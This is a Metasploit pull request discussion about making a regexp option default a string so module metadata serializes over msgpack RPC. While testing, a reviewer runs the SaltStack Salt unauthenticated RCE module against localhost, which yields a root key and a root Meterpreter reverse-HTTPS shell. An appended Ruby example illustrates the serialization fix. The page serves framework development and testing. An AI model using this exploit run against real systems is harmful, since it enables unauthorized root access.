OptRegExp default value as string representation #15686

Merged (1 commit), Sep 23, 2021

Conversation

@jmartin-tech jmartin-tech commented Sep 17, 2021

OptRegExp default should be string to utilize in a Regex.
This allows for the object to serialize in metadata and via
rpc bridge when transmitted using msgpack.

Verification

@jmartin-tech (Contributor Author) commented:

See #13401 for original module testing steps.

@space-r7 space-r7 self-assigned this Sep 21, 2021
@space-r7 (Contributor) commented:

Can confirm that the module still works as intended, although still getting the msfrpc error:

Module Output
msf6 > use exploit/linux/misc/saltstack_salt_unauth_rce
[*] Using configured payload python/meterpreter/reverse_https
msf6 exploit(linux/misc/saltstack_salt_unauth_rce) > set rhost 127.0.0.1
rhost => 127.0.0.1
msf6 exploit(linux/misc/saltstack_salt_unauth_rce) > set lhost 192.168.140.3
lhost => 192.168.140.3
msf6 exploit(linux/misc/saltstack_salt_unauth_rce) > run

[*] Started HTTPS reverse handler on https://192.168.140.3:8443
[*] 127.0.0.1:4506 - Using auxiliary/gather/saltstack_salt_root_key as check
[*] 127.0.0.1:4506 - Connecting to ZeroMQ service at 127.0.0.1:4506
[*] 127.0.0.1:4506 - Negotiating signature
[*] 127.0.0.1:4506 - Negotiating version
[*] 127.0.0.1:4506 - Negotiating NULL security mechanism
[*] 127.0.0.1:4506 - Sending READY command of type REQ
[*] 127.0.0.1:4506 - Yeeting _prep_auth_info() at 127.0.0.1:4506
[+] 127.0.0.1:4506 - Root key: 3TwdIigmyn90TognTkg7M0jKeU/YAgnPGB6cK/x0LlEZUuozMq2brUP9R6PZx8QU9PiihU/9pdo=
[*] 127.0.0.1:4506 - Connecting to ZeroMQ service at 127.0.0.1:4506
[*] 127.0.0.1:4506 - Negotiating signature
[*] 127.0.0.1:4506 - Negotiating version
[*] 127.0.0.1:4506 - Negotiating NULL security mechanism
[*] 127.0.0.1:4506 - Sending READY command of type REQ
[*] 127.0.0.1:4506 - Executing Python payload on the master: python/meterpreter/reverse_https
[*] 127.0.0.1:4506 - Yeeting runner() at 127.0.0.1:4506
[*] https://192.168.140.3:8443 handling request from 192.168.140.3; (UUID: mieehrsb) Staging python payload (39708 bytes) ...
[*] Meterpreter session 1 opened (192.168.140.3:8443 -> 127.0.0.1) at 2021-09-22 17:04:09 -0500

meterpreter > getuid
Server username: root
meterpreter > sysinfo
Computer        : 80228cfb4cee
OS              : Linux 5.10.47-linuxkit #1 SMP Sat Jul 3 21:51:47 UTC 2021
Architecture    : x64
System Language : C
Meterpreter     : python/linux
meterpreter >

msfrpc output

>> rpc.call('module.info', 'exploit', 'linux/misc/saltstack_salt_unauth_rce')
Traceback (most recent call last):
	18: from ./msfrpc:91:in `<main>'
	17: from /Users/space/rapid7/metasploit-framework/lib/rex/ui/text/irb_shell.rb:52:in `run'
	16: from /Users/space/rapid7/metasploit-framework/lib/rex/ui/text/irb_shell.rb:52:in `catch'
	15: from /Users/space/rapid7/metasploit-framework/lib/rex/ui/text/irb_shell.rb:53:in `block in run'
	 2: from (irb):1:in `<main>'
	 1: from /Users/space/rapid7/metasploit-framework/lib/msf/core/rpc/v10/client.rb:104:in `call'
/Users/space/rapid7/metasploit-framework/lib/msf/core/rpc/v10/client.rb:162:in `send_rpc_request': nil (RuntimeError)

Other modules that use a Regexp option seem to work fine:

rpc.call('module.info', 'auxiliary', 'spoof/nbns/nbns_response')
=>
{"type"=>"auxiliary",
 "name"=>"NetBIOS Name Service Spoofer",
 <snip>
   "REGEX"=>
    {"type"=>"regexp",
     "required"=>true,
     "advanced"=>false,
     "desc"=>"Regex applied to the NB Name to determine if spoofed reply is sent",
     "default"=>".*"}}}

@jmartin-tech (Contributor Author) commented:

@space-r7 are you sure the rpc service was running with this code?

$ ./msfrpc -P pass123 -a 127.0.0.1
[*] The 'rpc' object holds the RPC client interface
[*] Use rpc.call('group.command') to make RPC calls

>> rpc.call('module.info', 'exploit', 'linux/misc/saltstack_salt_unauth_rce')
=>
{"type"=>"exploit",
 "name"=>"SaltStack Salt Master/Minion Unauthenticated RCE",
 "fullname"=>"exploit/linux/misc/saltstack_salt_unauth_rce",
 "rank"=>"great",
 "disclosuredate"=>"2020-04-30",
 "description"=>

@space-r7 (Contributor) commented:

Oops, I was on the right branch, but hadn't restarted the service. This works now, thanks!

 ./msfrpc -U msf -P msf -a 127.0.0.1
[*] The 'rpc' object holds the RPC client interface
[*] Use rpc.call('group.command') to make RPC calls

>> rpc.call('module.info', 'exploit', 'linux/misc/saltstack_salt_unauth_rce')
=>
{"type"=>"exploit",
 "name"=>"SaltStack Salt Master/Minion Unauthenticated RCE",
 "fullname"=>"exploit/linux/misc/saltstack_salt_unauth_rce",
 "rank"=>"great",
 "disclosuredate"=>"2020-04-30",
 "description"=>
  "This module exploits unauthenticated access to the runner() and _send_pub() methods in the SaltStack Salt master's ZeroMQ request server, for versions 2019.2.3 and earlier and 3000.1 and earlier, to execute code as root on either the master or on select minions. VMware vRealize Operations Manager versions 7.5.0 through 8.1.0, as well as Cisco Modeling Labs Corporate Edition (CML) and Cisco Virtual Internet Routing Lab Personal Edition (VIRL-PE), for versions 1.2, 1.3, 1.5, and 1.6 in certain configurations, are known to be affected by the Salt vulnerabilities. Tested against SaltStack Salt 2019.2.3 and 3000.1 on Ubuntu 18.04, as well as Vulhub's Docker image.",
 "license"=>"Metasploit Framework License (BSD)",
 "filepath"=>
  "/Users/space/rapid7/metasploit-framework/modules/exploits/linux/misc/saltstack_salt_unauth_rce.rb",
 "arch"=>["python", "cmd"],
 <snip>

@space-r7 space-r7 added bug rn-fix release notes fix labels Sep 23, 2021
@space-r7 space-r7 merged commit 64f7581 into rapid7:master Sep 23, 2021
@space-r7 (Contributor) commented:

Release Notes

This fixes a crash in msfrpc that occurs due to the exploit/linux/misc/saltstack_salt_unauth_rce module's MINIONS option default being a regex instead of a string.
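The PR description and the release note above both come down to one point: a module option whose default is a Regexp object cannot be carried through the RPC layer, because msgpack has no native encoding for Regexp, while the same pattern stored as a String serializes fine and can be compiled with Regexp.new at the point of use. The following is an added example (not Metasploit's own code; the names OptRegexpLike, unsupported_paths and MSGPACK_NATIVE are hypothetical) that shows a small pre-flight check over module metadata flagging such a default, next to an option class that keeps the default as a string and compiles it only when needed.

```ruby
# Added example, not Metasploit code. Demonstrates why an option default
# that is a Regexp object breaks RPC serialisation and how storing the
# pattern as a String (compiled on use) avoids it. All names are hypothetical.

# Types MessagePack encodes without an extension type being registered.
# Deliberately conservative: Regexp is not on this list.
MSGPACK_NATIVE = [NilClass, TrueClass, FalseClass, Integer, Float, String, Symbol].freeze

# Walk a metadata structure (the shape a 'module.info' style RPC call returns)
# and report the key paths holding values msgpack cannot encode natively.
# Returns an empty array when the structure is safe to send.
def unsupported_paths(obj, path = 'root')
  case obj
  when Hash
    obj.flat_map { |k, v| unsupported_paths(v, "#{path}.#{k}") }
  when Array
    obj.each_with_index.flat_map { |v, i| unsupported_paths(v, "#{path}[#{i}]") }
  else
    MSGPACK_NATIVE.any? { |t| obj.is_a?(t) } ? [] : ["#{path} (#{obj.class})"]
  end
end

# Minimal stand-in for a regexp option: the default is kept as the pattern's
# source string so it serialises, and is compiled to a Regexp only on use.
class OptRegexpLike
  attr_reader :name, :default

  def initialize(name, default:, required: true, desc: '')
    @name = name
    # Accept either a Regexp or a String, but always store the String form.
    @default = default.is_a?(Regexp) ? default.source : default.to_s
    @required = required
    @desc = desc
  end

  # Compile the stored (or a user-supplied) pattern at the point of use.
  def normalize(value = @default)
    Regexp.new(value)
  end

  # Option metadata as it would be handed to the RPC layer.
  def to_h
    { 'type' => 'regexp', 'required' => @required, 'advanced' => false,
      'desc' => @desc, 'default' => @default }
  end
end

# Constructed sample metadata: the 'before' shape with a Regexp default,
# and the 'after' shape produced by OptRegexpLike.
BROKEN_INFO = {
  'type' => 'exploit',
  'options' => { 'MINIONS' => { 'type' => 'regexp', 'default' => /.*/ } }
}.freeze
FIXED_OPT = OptRegexpLike.new('MINIONS', default: /.*/, desc: 'Pattern applied to minion ids')
FIXED_INFO = { 'type' => 'exploit', 'options' => { 'MINIONS' => FIXED_OPT.to_h } }.freeze

if __FILE__ == $PROGRAM_NAME
  puts "before: #{unsupported_paths(BROKEN_INFO).inspect}"
  puts "after:  #{unsupported_paths(FIXED_INFO).inspect}"
  puts "match:  #{FIXED_OPT.normalize.match?('minion-01')}"
end
```

Running the file prints the offending path for the broken shape (root.options.MINIONS.default) and an empty list for the fixed one; a check like unsupported_paths is cheap to run in a module's spec suite so that a Regexp (or any other non-primitive) default is caught before it reaches the RPC bridge.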
